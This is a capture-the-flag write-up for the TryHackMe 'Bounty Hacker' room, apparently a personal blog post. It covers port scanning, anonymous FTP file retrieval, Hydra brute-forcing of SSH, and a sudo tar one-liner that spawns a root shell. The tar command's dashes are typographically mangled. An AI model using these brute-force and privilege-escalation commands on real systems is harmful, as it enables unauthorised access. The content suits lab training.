Bounty Hacker — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my Bounty Hacker — TryHackMe — WriteUp. Check it out!
First, deploy the machine and nmap for opened ports.
nmap -A -T4 -p- -v <ip>
As port 21(ftp) is opened and can be accessed by anonymous, let’s ftp to the machine.
Let’s get all the txt file to our machine.
mget *
Read content of those files.
Now I know lin wrote this task.
The locks.txt file is a list of password, and it’s too long to capture here, so just read it yourselves.
We can use this file to bruteforce SSH, using Hydra.
hydra -l lin -P locks.txt ssh://10.10.75.253
Wait for Hydra to finish and I’ll have the password.
Now ssh to the machine as lin.
Get the 1st flag on Desktop
Now I’ll try to get root to get the final flag. First, sudo -l to see if lin can run sudo.
Well lin can run tar as root. I can use tar to spawn a shell as root using this cmf:
sudo tar -cf /dev/null /dev/null — checkpoint=1 — checkpoint-action=exec=/bin/sh
Now get the final flag.
The end.
HAPPY HACKING